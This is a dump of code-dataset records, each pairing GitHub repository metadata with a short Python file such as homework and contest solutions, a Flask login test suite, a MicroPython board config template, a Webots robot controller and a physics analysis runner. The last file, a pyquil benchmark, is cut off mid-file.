199e2fddf75cc9277b94c8b9a7376bad6d387ac5 | 163bbb4e0920dedd5941e3edfb2d8706ba75627d | /Code/CodeRecords/2718/60652/241534.py | 867df002441925aee0423dd0522251ff896ef573 | [] | no_license | AdamZhouSE/pythonHomework | a25c120b03a158d60aaa9fdc5fb203b1bb377a19 | ffc5606817a666aa6241cfab27364326f5c066ff | refs/heads/master | 2022-11-24T08:05:22.122011 | 2020-07-28T16:21:24 | 2020-07-28T16:21:24 | 259,576,640 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 253 | py | l=list("".join(input()))
s= input().replace(',', '').replace('[', '').replace(']', '')
index=0
while index<len(s):
tmp=l[int(s[index])]
l[int(s[index])]=l[int(s[index+1])]
l[int(s[index+1])]=tmp
index+=2
print("".join(str(i) for i in l)) | [
"1069583789@qq.com"
] | 1069583789@qq.com |
4168c9aca8547d6a3efc4a82c8b4fcdd1f820471 | 91365d8ef539a9952f048e1fef03b6f76a0ccf60 | /torch/onnx/_internal/fx/__init__.py | a3037f1cf29a2b678ab4e418fd1c190f9402063f | [
"BSD-2-Clause",
"LicenseRef-scancode-secret-labs-2011",
"BSD-3-Clause",
"LicenseRef-scancode-generic-cla",
"BSL-1.0",
"Apache-2.0"
] | permissive | ppwwyyxx/pytorch | 6e68cd816e8197e298c50d7f0e82cc97aff4dbdf | 2883cb464810611c5de37b2ca06771582ddf5f83 | refs/heads/master | 2023-08-10T00:39:48.165007 | 2023-06-07T01:51:59 | 2023-06-07T01:51:59 | 160,557,191 | 3 | 3 | NOASSERTION | 2018-12-05T17:53:38 | 2018-12-05T17:53:37 | null | UTF-8 | Python | false | false | 170 | py | from .context import FxToOnnxContext
from .serialization import save_model_with_external_data
__all__ = [
"save_model_with_external_data",
"FxToOnnxContext",
]
| [
"pytorchmergebot@users.noreply.github.com"
] | pytorchmergebot@users.noreply.github.com |
368092fc9f933ed1677b7069f0f8572a37fb26ea | a7288d7cce714ce3ddf3de464f959a2cb6c62e80 | /Django_Intro/bin/sqlformat | 65622073bec5cc8bc536e3d99a8912fd7b304755 | [] | no_license | jhflorey/Python | 94d898c9cfa05a941e0ac0c3506587ad494b76ab | 4d005000bb95ee4414a6aebef4cebdcbc13e4d99 | refs/heads/master | 2020-03-20T10:44:00.560147 | 2018-06-14T16:48:49 | 2018-06-14T16:48:49 | 137,382,015 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 268 | #!/Users/jhflorey/Documents/Dojo/Python/Django_Intro/bin/python2.7
# -*- coding: utf-8 -*-
import re
import sys
from sqlparse.__main__ import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(main())
| [
"jhflorey@gmail.com"
] | jhflorey@gmail.com | |
3b0bb11732c17bc4fc7df9419413a488fbd43761 | 149364d3e923ac89990be782a4a8464f4f7f0377 | /number_reader.py | ef7c215a47a06c4bd943587aa979b95b81be8457 | [] | no_license | laboyd001/python-crash-course-ch10 | dec44a1a81dc20931f4cc22e6ab6da0d6716895a | b42aadc9aafc422ffd1e99035c8519cae02ebdba | refs/heads/master | 2020-04-13T20:25:42.502954 | 2018-12-28T16:27:37 | 2018-12-28T16:27:37 | 163,429,396 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 164 | py | #reads the list back from the json file
import json
filename = 'numbers.json'
with open(filename) as f_obj:
numbers = json.load(f_obj)
print(numbers) | [
"lesley.a.boyd1@gmail.com"
] | lesley.a.boyd1@gmail.com |
99a5ccdf1262a853052de6a1007107d9fb70371e | 3e4c9f69ea13636e2bf8766b3736af373a3c83f6 | /MonoHbb/RunAllRegionUsingFarmOut_wj.py | cf5d8db29d725dda489f493b8ab9557fbeeca3d8 | [] | no_license | ramankhurana/MonoH | c32f44fddb65677d31846ec6aa9c6c0ac0b5877b | 8495336ba22a81858fcaf23a7f4ebd7fc6880985 | refs/heads/master | 2020-04-18T14:41:40.393519 | 2017-08-10T11:16:53 | 2017-08-10T11:16:53 | 67,509,749 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,257 | py | #!/usr/bin/env python
#from MonoHBranchReader import AnalyzeDataSet, CheckFilter, MakeTable, DeltaR, Phi_mpi_pi
import os
mode='wj'
#inputfilename='NCUGlobalTuples_1.root'
#inputfilename='input.txt'
#outfilename='out.root'
inputfilename = os.environ['INPUT']
outfilename = os.environ['OUTPUT']
if mode == 'signal':
os.system('./MonoHBranchReader.py -m 100.0 -M 150.0 -i '+inputfilename+' -o '+outfilename+' -a -j 0 -J 2 -l 0 -L 1 --MLow1 100.0 --MHigh1 150.0 -F ')
if mode == 'signalpSB':
os.system('./MonoHBranchReader.py -m 30.0 -M 250.0 -i '+inputfilename+' -o '+outfilename+' -a -j 0 -J 2 -l 0 -L 1 --MLow1 30.0 --MHigh1 250.0 -F ')
## Mass Sidebands
## inverting the mass cut
if mode == 'zj':
os.system('./MonoHBranchReader.py -m 30.0 -M 100.0 -i '+inputfilename+' -o '+outfilename+' -a -j 0 -J 2 -l 0 -L 1 --MLow1 150.0 --MHigh1 250.0 -F')
##WJets
## 1 additinal lepton
## remove the mass cut
if mode == 'wj':
os.system('./MonoHBranchReader.py -m 30.0 -M 250.0 -i '+inputfilename+' -o '+outfilename+' -a -j 1 -J 2 -l 1 -L 2 --MLow1 30.0 --MHigh1 250.0 -F')
##TT
## 1 additional lepton
## >1 additional jets
if mode == 'tt':
os.system('./MonoHBranchReader.py -m 30.0 -M 250.0 -i '+inputfilename+' -o '+outfilename+' -a -j 2 -J 10 -l 1 -L 2 --MLow1 30.0 --MHigh1 250.0 -F')
## TT+WJ
if mode == 'wt':
os.system('./MonoHBranchReader.py -m 30.0 -M 250.0 -i '+inputfilename+' -o '+outfilename+' -a -j 0 -J 10 -l 1 -L 2 --MLow1 30.0 --MHigh1 250.0 -F')
## WJAlphaBet
if mode == 'wjalphabet':
os.system('./MonoHBranchReader.py -m 30.0 -M 100.0 -i '+inputfilename+' -o '+outfilename+' -a -j 1 -J 2 -l 1 -L 2 --MLow1 150.0 --MHigh1 250.0 -F')
## TTAlphabet
if mode == 'ttalphabet':
os.system('./MonoHBranchReader.py -m 30.0 -M 100.0 -i '+inputfilename+' -o '+outfilename+' -a -j 2 -J 10 -l 1 -L 2 --MLow1 150.0 --MHigh1 250.0 -F')
##WTAlphabet
if mode == 'wtalphabet':
os.system('./MonoHBranchReader.py -m 30.0 -M 100.0 -i '+inputfilename+' -o '+outfilename+' -a -j 0 -J 10 -l 1 -L 2 --MLow1 150.0 --MHigh1 250.0 -F')
| [
"raman.khurana@cern.ch"
] | raman.khurana@cern.ch |
c7b276ea5e16b96df513e71b6809af73b654a3e7 | 9743d5fd24822f79c156ad112229e25adb9ed6f6 | /xai/brain/wordbase/adjectives/_indigent.py | f6376ec43de6ef0c5d00c850cc39f702bc8227fb | [
"MIT"
] | permissive | cash2one/xai | de7adad1758f50dd6786bf0111e71a903f039b64 | e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6 | refs/heads/master | 2021-01-19T12:33:54.964379 | 2017-01-28T02:00:50 | 2017-01-28T02:00:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 371 | py |
#calss header
class _INDIGENT():
def __init__(self,):
self.name = "INDIGENT"
self.definitions = [u'very poor']
self.parents = []
self.childen = []
self.properties = []
self.jsondata = {}
self.specie = 'adjectives'
def run(self, obj1, obj2):
self.jsondata[obj2] = {}
self.jsondata[obj2]['properties'] = self.name.lower()
return self.jsondata
| [
"xingwang1991@gmail.com"
] | xingwang1991@gmail.com |
85f61554cf66fecc3b5b8039b168fd7dffb6a7ef | 38e82df34efcb0ed819f49457210be9616caf875 | /ABC/001/1_b.py | 6bdba55ebd8cc3127a1ca59bbcc6bb1fe74238b8 | [] | no_license | oden6680/AtCoder | 96385ce02ff02909e2f17123dad67d63baa4a0f7 | 3b20885d86726fcf4617076d653abb125609125e | refs/heads/master | 2022-09-19T13:12:02.705304 | 2020-05-31T19:58:51 | 2020-05-31T19:58:51 | 263,191,816 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 208 | py | N = int(input())
N = N/1000
if N < 0.1:
vv = 0
elif 0.1 <= N <= 5:
vv = 10 * N
elif 6 <= N <= 30:
vv = N + 50
elif 35 <= N <= 70:
vv = (N-30)/5 + 80
elif N > 70:
vv = 89
print(str(int(vv)).zfill(2)) | [
"oden6680@gmail.com"
] | oden6680@gmail.com |
42520a99c2baa0939e5f98eaaa0557f0cd41267d | 4bc19f4dd098ebedcb6ee78af0ae12cb633671fe | /chat_tornadio/utils.py | 4b8d14624b491fecf606f0044b54b05fb6f57ba5 | [] | no_license | StanislavKraev/rekvizitka | 958ab0e002335613a724fb14a8e4123f49954446 | ac1f30e7bb2e987b3b0bda4c2a8feda4d3f5497f | refs/heads/master | 2021-01-01T05:44:56.372748 | 2016-04-27T19:20:26 | 2016-04-27T19:20:26 | 57,240,406 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 199 | py | # -*- coding: utf-8 -*-
import time
def get_cts():
return int(round(time.time() * 100000))
def cts_from_timedelta(td):
ts = td.seconds + td.days * 24 * 3600
return ts * 100000
| [
"kraevst@yandex.ru"
] | kraevst@yandex.ru |
99d9e5dbdc792339e2c8bba2b457342b933a13d6 | f0a5ad7b8aa39f51f233391fead0da3eabecc4ee | /.history/move_20191127160834.py | d778b2ac46a5923d344172f9540fa2d93731f29a | [] | no_license | OseiasBeu/webScrapping | e0a524847e55b24dbbd3d57bbe7fa43b4e101f48 | 1e72c7551aea355a891043baecfcbab8a89e719a | refs/heads/master | 2022-10-25T18:12:50.858653 | 2020-06-18T01:29:24 | 2020-06-18T01:29:24 | 224,681,550 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 346 | py | import os, shutil, glob
oldAddres = 'C:/Users/beuo/Downloads/*.xlsx'
newAdress = 'C:/Users/beuo/Documents/Demandas/AtualizaMiddleIntegrationVtex'
shutil.copy(oldAdress, newAdress)
# try:
# os.makedirs(dst_fldr)
# except:
# print("erro")
# for xlsx_file in glob.glob(src_fldr+"//*.xlsx"):
# shutil.copy2(src_fldr,dst_fldr)
| [
"oseiasbeu@outlook.com"
] | oseiasbeu@outlook.com |
2c86b17eb75e0656480c03e3bf0711470a886191 | 6761d430bfa38413985efb319cb02171729f3481 | /indlulamithi/makeorders.py | b447228ba164705bde80fab09cd18d08bb090391 | [
"BSD-3-Clause"
] | permissive | crawfordsm/indlulamithi | b335b469dabefa8b4e1d6dbaafb18eb99c0ee348 | 3d88278f3e7ca5ac46a6bf987eeb475739bd8f22 | refs/heads/master | 2020-12-24T16:05:54.929254 | 2015-01-27T20:41:26 | 2015-01-27T20:41:26 | 29,680,902 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,815 | py | import sys
import os
import numpy as np
from scipy import ndimage as nd
from astropy.io import fits
from astropy import stats
def minflattenimage(data, size=10):
"""Smooth the image and flatten it using the minimum value in the image
Parameters
----------
data: ndarray
image to flatten
size: int
smoothing size for image
Returns
-------
data: ndarray
flattenned image
"""
# flatten image in y direction
m = np.median(data, axis=1)
m = nd.minimum_filter(m, size=size)
m.shape = (len(m), 1)
data = data / m
# flatten image in x direction
m = np.median(data, axis=0)
m = nd.minimum_filter(m, size=size)
data = data / m
return data
def calc_coef(data, xc, yc):
"""Given a position of an order,
determine the equations that defines
its position in the image
"""
yc = int(yc)
cutout = data.copy()
obj, sci_num = nd.label(cutout)
cutout[obj != obj[yc, xc]] = 0
y, x = np.where(cutout > 0)
coef = np.polyfit(x, y, 2)
return cutout, coef
def make_orders(data, xc=680, limit=1.5, image_size=10, order_size=2, outfile=None):
"""Determine coefficients that describe all of the orders in the image
Parameters
----------
data: ndarray
image array with orders in the image
xc: int
Column to extract orders from
limit: float
Limit for select orders in flattened data
image_size: int
Size for minimum filtering of images
order_size: int
Size for minimum filtering of orders
Returns
-------
order_dict: dict
Dictionary with the key representing the y-position of the
order at xc and containing a list of coefficients describing
the shape of the order
"""
# flatten the data
data = minflattenimage(data, image_size)
# create a rough image of just the location of the orders
mask = (data < limit)
data[mask] = 0
# clean up the orders and caculate
# starting position for each order
n = nd.minimum_filter(data[:, xc], size=order_size)
o, num = nd.label(n)
pos = nd.center_of_mass(n, o, range(1, num))
pos = np.array(pos)
# determine the shape of the orders
order_dict = {}
for yc in pos:
yc = yc[0]
cutout, coef = calc_coef(data, xc, yc)
order_dict[yc] = coef
if outfile is not None:
keys = sorted(order_dict.keys())
fout = open(outfile, 'w')
for i in keys:
coef = order_dict[i]
output = '%i ' % i
output += ' '.join(['%e' % x for x in coef])
if i > 0:
fout.write(output + '\n')
fout.close()
return order_dict
| [
"crawfordsm@gmail.com"
] | crawfordsm@gmail.com |
6fff6f6268ec05e04bfd66704d708b4988f2a055 | b47289da22cab052a5aa86c940ee45073a82edcb | /board/board_config_tmpl.py | 0bc4e4365410ce214346b7805cc4ae67d130f9fa | [
"MIT"
] | permissive | domenc/mqboard | 3195d4d9342f4a2d805fe17f6e22d240af265a7a | 46ccff99ac60f4f2cb892f41f2b5f8d5a1bc59a9 | refs/heads/master | 2022-11-08T05:33:30.286187 | 2020-07-02T06:25:56 | 2020-07-02T06:25:56 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,414 | py | # board_config contains magic strings that don't get published or checked into source control
# kind tells us which type of board this is running, it is used in board to define LED pins
kind = "nodemcu" <--- UPDATE
#kind = "huzzah32"
#kind = "lolin-d32"
#kind = "esp32thing"
#kind = "tinypico"
#kind = "ezsbc"
# location is the system name and is used in mqtt topics, etc
location = "mqtest"
wifi_ssid = "MY-SSID" <--- UPDATE
wifi_pass = "MY-PASSWD" <--- UPDATE
# directories to add to the system search path (after ["", "/lib"]), not applied in safe mode
syspath = ["/src"]
#
# Configuration of loaded modules
#
# The dicts below get passed to the start() function of the modules loaded by main.py.
# The name of each dict must match the name of the module.
mqtt = { # refer to mqtt_async for the list of config options
"server" : "192.168.0.14", <--- UPDATE
"ssl_params" : { "server_hostname": "mqtt.example.com" }, <--- UPDATE/REMOVE
"user" : "esp32/mqtest", <--- UPDATE/REMOVE
"password" : "00000000000000000000000000000000", <--- UPDATE/REMOVE
"ssid" : wifi_ssid,
"wifi_pw" : wifi_pass,
}
# little convenience for demo to support with and without mqtt["user"]
mqtt_prefix = mqtt.get("user", "esp32/" + location)
mqrepl = {
"prefix" : mqtt_prefix + "/mqb/", # prefix is before cmd/... or reply/...
}
watchdog = {
"prefix" : mqrepl["prefix"], # must be mqrepl["prefix"]
"timeout" : 120, # watchdog timeout in seconds, default is 300
"allok" : 180, # wait time in secs after connection before giving all-OK (no safe mode)
"revert" : True, # whether to revert from safe mode to normal mode after all-OK time
}
logging = {
"topic" : mqtt_prefix + "/log",
"boot_sz" : 10*1024, # large buffer at boot, got plenty of memory then
"boot_level" : 10, # 10=debug, 20=info, 30=warning (avoiding import logging)
"loop_sz" : 1024, # more moderate buffer once connected
"loop_level" : 10, # 10=debug, 20=info, 30=warning (avoiding import logging)
}
# Modules to load and call start on. For module foo, if this file defines foo then
# foo.start(mqtt, foo) is called, else foo.start(mqtt, {}). If there is no foo.start() then
# that's OK too.
modules = [ "mqtt", "logging", "mqrepl", "watchdog" ]
| [
"tve@voneicken.com"
] | tve@voneicken.com |
aca7f484f5a03a70cba8f08aa9de457a46a307c0 | 6098c4c76b937fe44f941893c6aa6ad4d0412000 | /doug_proj/doug/credentials_template.py | 87f9a3614b60401c316266034e6efb4905579d58 | [] | no_license | kishan/doug | 8979d7fa6885fe143e42c9b7fed024c487ff94ad | 6482b60bc4dcbdf7ac6460db0f3da7c4342482c2 | refs/heads/master | 2021-01-22T05:06:45.557212 | 2017-02-12T23:03:18 | 2017-02-12T23:03:18 | 81,622,898 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 137 | py | # copy template below and save in file called credentials.py
CREDENTIALS = {
"access_token":"",
"VALIDATION_TOKEN":"",
"api_key":""
} | [
"kspatel2018@gmail.com"
] | kspatel2018@gmail.com |
74346e82fb06a0cd34614b8570a7c22230e3218e | 3712a929d1124f514ea7af1ac0d4a1de03bb6773 | /开班笔记/个人项目/果园/project/userinfo/views.py | 1eb53cd0c7dd00a94ef94e8a2ede204e24208a68 | [] | no_license | jiyabing/learning | abd82aa3fd37310b4a98b11ea802c5b0e37b7ad9 | 6059006b0f86aee9a74cfc116d2284eb44173f41 | refs/heads/master | 2020-04-02T20:47:33.025331 | 2018-10-26T05:46:10 | 2018-10-26T05:46:10 | 154,779,387 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,293 | py | import logging
from django.contrib import messages
from django.contrib.auth.hashers import make_password, check_password
from django.core.exceptions import ObjectDoesNotExist
from django.db import DatabaseError
from django.shortcuts import render, redirect
from userinfo.models import UserInfo
# Create your views here.
auth_check = 'abc'
def login(request):
return render(request, 'login.html')
def login_in(request):
if request.method == 'POST':
user = UserInfo()
user.name = request.POST.get('user')
user.password = request.POST.get('pwd')
try:
find_user = UserInfo.objects.filter(name=user.name)
if len(find_user) <= 0:
messages.add_message(request, messages.ERROR, '该用户未注册')
return redirect('/user/login')
if not check_password(user.password, find_user[0].password):
return render(request, 'login.html',
{'user_info': user, 'message_error': '密码错误'})
except ObjectDoesNotExist as e:
logging.warning(e)
return redirect('/')
return redirect('user/login')
def register(request):
return render(request, 'register.html')
def register_in(request):
if request.method == 'POST':
new_user = UserInfo()
new_user.name = request.POST.get('user')
if not new_user.name:
return render(request, 'register.html', {'message0': '请输入用户名'})
try:
a = UserInfo.objects.get(name=new_user.name)
if a:
return render(request, 'register.html', {'message1': '该用户已注册'})
except ObjectDoesNotExist as e:
logging.warning(e)
if request.POST.get('pwd') != request.POST.get('cpwd'):
return render(request, 'register.html', {'message2': '两次密码不一致'})
new_user.password = make_password(request.POST.get('pwd'), auth_check, 'pbkdf2_sha1')
new_user.phone = request.POST.get('phone')
new_user.email = request.POST.get('email')
try:
new_user.save()
except DatabaseError as e:
logging.warning(e)
return render(request, 'index.html')
return render(request, 'register.html') | [
"yabing_ji@163.com"
] | yabing_ji@163.com |
f9f4751d2e9c05ff20569e2fff730457d677e304 | 57fc5d54f5df359c7a53020fb903f36479d3a322 | /controllers/.history/robot/robot_20201214160008.py | 046d51ee297654183bab7c9b7fcbfad4b3fd37f5 | [] | no_license | shenwuyue-xie/webots_testrobots | 929369b127258d85e66c5275c9366ce1a0eb17c7 | 56e476356f3cf666edad6449e2da874bb4fb4da3 | refs/heads/master | 2023-02-02T11:17:36.017289 | 2020-12-20T08:22:59 | 2020-12-20T08:22:59 | 323,032,362 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,172 | py |
from controller import Robot
from controller import Connector
from controller import Motor
from controller import DistanceSensor
from controller import Device
from controller import PositionSensor
import numpy as np
from deepbots.robots.controllers.robot_emitter_receiver_csv import \
RobotEmitterReceiverCSV
import math
class TaskDecisionRobot(RobotEmitterReceiverCSV):
def __init__(self):
super(TaskDecisionRobot,self).__init__()
self.name = self.robot.getName()
self.timestep = int(self.robot.getBasicTimeStep())
self.setupsensors()
self.setupmotors()
self.robot.batterySensorEnable(self.timestep)
def normalize_to_range(self,value, min, max, newMin, newMax):
value = float(value)
min = float(min)
max = float(max)
newMin = float(newMin)
newMax = float(newMax)
return (newMax - newMin) / (max - min) * (value - max) + newMax
def setupsensors(self):
self.distancesensors = []
if self.name == "0":
self.n_distancesensors = 7
self.rearconnector = self.robot.getConnector("rear_connector")
self.dsNames = ['ds' + str(i) for i in range(self.n_distancesensors)]
for i in range(self.n_distancesensors):
self.distancesensors.append(self.robot.getDistanceSensor(self.dsNames[i]))
self.distancesensors[i].enable(self.timestep)
else :
self.n_distancesensors = 4
self.frontconnector = self.robot.getConnector("front_connector")
self.rearconnector = self.robot.getConnector("rear_connector")
self.dsNames = ['ds' + str(i) for i in range(self.n_distancesensors)]
for i in range(self.n_distancesensors):
self.distancesensors.append(self.robot.getDistanceSensor(self.dsNames[i]))
self.distancesensors[i].enable(self.timestep)
def setupmotors(self):
self.leftmotor= self.robot.getMotor('left_motor')
self.rightmotor= self.robot.getMotor('right_motor')
self.frontmotor = self.robot.getMotor('front_motor')
self.rearmotor = self.robot.getMotor('rear_motor')
self.leftmotor.setPosition(float('inf'))
self.rightmotor.setPosition(float('inf'))
self.leftmotor.setVelocity(0)
self.rightmotor.setVelocity(0)
self.rearpositionsensor = self.rearmotor.getPositionSensor()
self.rearpositionsensor.enable(self.timestep)
def create_message(self):
message = []
for distancesensor in self.distancesensors:
message.append(distancesensor.getValue())
return message
def use_message_data(self,message):
for i in range(2):
if float(message[i]) <0:
message[i] = self.normalize_to_range(float(message[i]),-0.1,0,-8,-4)
if float(message[i]) >= 0:
message[i] = self.normalize_to_range(float(message[i]),0,1.1,6,12)
for j in range(2,14):
# message[i] = float(message[i])
# x = np.random.uniform(0,1,12)
message[j] = self.normalize_to_range(float(message[j]),-0.1,1.1,0,1)
if message [i] >= 0 and message[i] <= 0.3:
message[i] = 0
elif message [i] > 0.4 and message [i] <= 0.7:
message[i] = 0
elif message [i] > 0.8 and message[i] <= 1:
message[i] = 0
elif message[i] > 0.7 and message[i] <= 0.8:
message[i] = self.normalize_to_range(message[i],0.7,0.8,0,math.pi/2)
elif message[i] > 0.3 and message[i] <= 0.4:
message[i] = self.normalize_to_range(message[i],0,0.1,-math.pi/2,0)
self.leftmotor.setVelocity(message[0])
self.rightmotor.setVelocity(message[1])
self.frontmotor.setPosition(message[int(self.name) * 2 + 2])
self.rearmotor.setPosition(message[int(self.name) * 2 + 3])
controller = TaskDecisionRobot()
controller.run()
| [
"1092673859@qq.com"
] | 1092673859@qq.com |
25ebc6477404f30e4e15e869ae2e7bd4a932b605 | 7950c4faf15ec1dc217391d839ddc21efd174ede | /problems/0092.0_Reverse_Linked_List_II.py | f76687c1bb1a3916b824b332406fc4c4f57eb438 | [] | no_license | lixiang2017/leetcode | f462ecd269c7157aa4f5854f8c1da97ca5375e39 | f93380721b8383817fe2b0d728deca1321c9ef45 | refs/heads/master | 2023-08-25T02:56:58.918792 | 2023-08-22T16:43:36 | 2023-08-22T16:43:36 | 153,090,613 | 5 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,197 | py | '''
I do it only in one pass.
T: O(N)
S: O(1)
Runtime: 64 ms, faster than 13.84% of Python3 online submissions for Reverse Linked List II.
Memory Usage: 13.9 MB, less than 87.01% of Python3 online submissions for Reverse Linked List II.
'''
# Definition for singly-linked list.
# class ListNode:
# def __init__(self, val=0, next=None):
# self.val = val
# self.next = next
class Solution:
def reverseBetween(self, head: Optional[ListNode], left: int, right: int) -> Optional[ListNode]:
if left == right:
return head
hair = ListNode(next=head)
node = hair
for _ in range(left - 1):
node = node.next
# node.next -> start
start = tail = node.next
another = None
for _ in range(right - left + 1):
nxt = start.next
start.next = another
another = start
start = nxt
# link tail to trailing nodes
tail.next = start
# link heading-nodes to another
node.next = another
return hair.next
'''
no need to check left == right
Runtime: 65 ms, faster than 12.39% of Python3 online submissions for Reverse Linked List II.
Memory Usage: 14.2 MB, less than 18.38% of Python3 online submissions for Reverse Linked List II.
'''
# Definition for singly-linked list.
# class ListNode:
# def __init__(self, val=0, next=None):
# self.val = val
# self.next = next
class Solution:
def reverseBetween(self, head: Optional[ListNode], left: int, right: int) -> Optional[ListNode]:
hair = ListNode(next=head)
node = hair
for _ in range(left - 1):
node = node.next
# node.next -> start
start = tail = node.next
another = None
for _ in range(right - left + 1):
nxt = start.next
start.next = another
another = start
start = nxt
# link tail to trailing nodes
tail.next = start
# link heading-nodes to another
node.next = another
return hair.next
| [
"838255715@qq.com"
] | 838255715@qq.com |
07576f9b3eec4640fe26ba3cef131645dcdf2a17 | 4b52336c8e5251c759a28d60635cbf8a66615c07 | /scripts/metrical_error.py | 70b487d57b58382d9077b6cd3c9f92c796e0d464 | [] | no_license | sanskrit-kosha/kosha | f51d8681be0dc8a6a9c9656cec446dc03875a1a0 | 39b90ae9265ab1d7408f889a12092788432eb2fb | refs/heads/master | 2023-04-30T02:46:59.005799 | 2023-04-10T05:00:29 | 2023-04-10T05:00:29 | 189,419,853 | 24 | 13 | null | 2020-12-19T08:24:12 | 2019-05-30T13:35:09 | HTML | UTF-8 | Python | false | false | 1,781 | py | #!/usr/bin/python
# -*- coding: utf-8 -*-
"""Tries to identify verses with imperfect meters from given file.
Prerequisites:
Put metrical_error.py file in shreevatsa/sanskrit folder.
Put the input_file to be checked for metrical inconsistencies
Usage from commandline:
python metrical_error.py input_file
python metrical_error.py input_file > log.txt
"""
from __future__ import absolute_import, division, print_function, unicode_literals
import logging
import sys
import codecs
import identifier_pipeline
if __name__ == '__main__':
# Set logging level.
logging.getLogger().setLevel(logging.WARNING)
# create identifier class.
identifier = identifier_pipeline.IdentifierPipeline()
# input file.
filein = sys.argv[1]
# Read input file.
fin = codecs.open(filein, 'r', 'utf-8')
# Initialize empty verse.
verse = ''
# For each line,
for line in fin:
# Ignore lines starting with semicolon. Process others.
if not line.startswith(';'):
# Add to verse.
verse += line
# Double danda denotes end of verse. Start identifying meter.
if '॥' in line:
# print(verse)
# Identify meter.
identifier.IdentifyFromText(verse)
# Extract debug information.
debug_info = identifier.AllDebugOutput()
# for perfect match, raise no error.
if 'exact match' in debug_info:
pass
# Else print the verse and associated debug information.
else:
print(verse.encode('utf-8'))
print(debug_info.encode('utf-8'))
# Reset verse to blank
verse = ''
| [
"drdhaval2785@gmail.com"
] | drdhaval2785@gmail.com |
c18b3cb7ee53ef6f4e57c84b67f7d88e779e289e | 65f14cce454ac723c74f70b5d39cdc1a58b6a91b | /test.py | c46fdab8e3a52e9e967ba3e0471969553358af18 | [] | no_license | wagolemusa/FlaskAPis | d9d2b81d4a8520d0f79bf476e6e9d0f8a655d6bf | d916b04a962e72a9142a75d7fc53840fbcfec422 | refs/heads/master | 2020-03-23T15:02:00.408224 | 2018-10-15T15:14:57 | 2018-10-15T15:14:57 | 141,716,049 | 0 | 0 | null | 2018-10-10T16:53:05 | 2018-07-20T13:33:59 | Python | UTF-8 | Python | false | false | 1,829 | py | from app import app
import unittest
class FlaskTestCase(unittest.TestCase):
#Ensure that flask was sett up correctly
def test_index(self):
tester = app.test_client(self)
response = tester.get('/login', content_type='html/text')
self.assertEqual(response.status_code, 200)
# Ensure that login page loads correctly
def test_login_page_loads(self):
tester = app.test_client(self)
response = tester.get('/login', content_type='html/text')
self.assertFalse(b'Please try again.' in response.data)
# Ensure that login correctly
def test_correct_login(self):
tester = app.test_client(self)
response = tester.post(
'/login',
data=dict(username="admin", password="admin"),
follow_redirects=True
)
self.assertIn(b'You are just login', response.data)
# Test Wrong credentails
def test_incorrect_login(self):
tester = app.test_client(self)
response = tester.post(
'/login',
data=dict(username="wrong", password="wrong"),
follow_redirects=True
)
self.assertIn(b'Invalid credentials. Please try again', response.data)
# test loggout
def test_logout(self):
tester = app.test_client(self)
response = tester.post(
'/login',
data=dict(username="admin", password="admin"),
follow_redirects=True
)
self.assertIn(b'You were just Logged out', response.data)
#Ensure that main page requires login
def test_main_route_requires_login(self):
tester = app.test_client(self)
response = tester.get('/', follow_redirects=True)
self.assertTrue(b'You need to first Login', response.data)
def test_post_show_up(self):
tester = app.test_client(self)
response = tester.post(
'/login',
data=dict(username="admin", password="admin"),
follow_redirects=True
)
self.assertIn(b'Im well', response.data)
if __name__ =='__main__':
unittest.main() | [
"homiemusa@gmail.com"
] | homiemusa@gmail.com |
bf161dacfe80fdf84648076044416621060b7549 | 2bb90b620f86d0d49f19f01593e1a4cc3c2e7ba8 | /pardus/tags/2008/programming/libs/openexr/actions.py | bbb492342c23594450270c0a93e02d0fe4894b4b | [] | no_license | aligulle1/kuller | bda0d59ce8400aa3c7ba9c7e19589f27313492f7 | 7f98de19be27d7a517fe19a37c814748f7e18ba6 | refs/heads/master | 2021-01-20T02:22:09.451356 | 2013-07-23T17:57:58 | 2013-07-23T17:57:58 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 951 | py | #!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Copyright 2005-2008 TUBITAK/UEKAE
# Licensed under the GNU General Public License, version 2.
# See the file http://www.gnu.org/licenses/old-licenses/gpl-2.0.txt
from pisi.actionsapi import autotools
from pisi.actionsapi import pisitools
from pisi.actionsapi import shelltools
from pisi.actionsapi import get
def setup():
autotools.configure("--enable-shared \
--enable-imfexamples \
--enable-imffuzztest \
--disable-static")
def build():
autotools.make()
def install():
# documents and examples go to "/usr/share/OpenEXR" without these parameters
docdir = "/usr/share/doc/%s" % get.srcTAG()
examplesdir = "%s/examples" % docdir
autotools.rawInstall("DESTDIR=%s docdir=%s examplesdir=%s" % (get.installDIR(), docdir, examplesdir))
pisitools.dodoc("AUTHORS", "ChangeLog","NEWS", "README","LICENSE")
| [
"yusuf.aydemir@istanbul.com"
] | yusuf.aydemir@istanbul.com |
7625a749cac98b120e763c7d4acf51ac35d00eba | 09e57dd1374713f06b70d7b37a580130d9bbab0d | /benchmark/startPyquil2055.py | 8182827470465e78a48300f2e0b4bb6f4b4b58b2 | [
"BSD-3-Clause"
] | permissive | UCLA-SEAL/QDiff | ad53650034897abb5941e74539e3aee8edb600ab | d968cbc47fe926b7f88b4adf10490f1edd6f8819 | refs/heads/main | 2023-08-05T04:52:24.961998 | 2021-09-19T02:56:16 | 2021-09-19T02:56:16 | 405,159,939 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,668 | py | # qubit number=4
# total number=30
import pyquil
from pyquil.api import local_forest_runtime, QVMConnection
from pyquil import Program, get_qc
from pyquil.gates import *
import numpy as np
conn = QVMConnection()
def make_circuit()-> Program:
prog = Program() # circuit begin
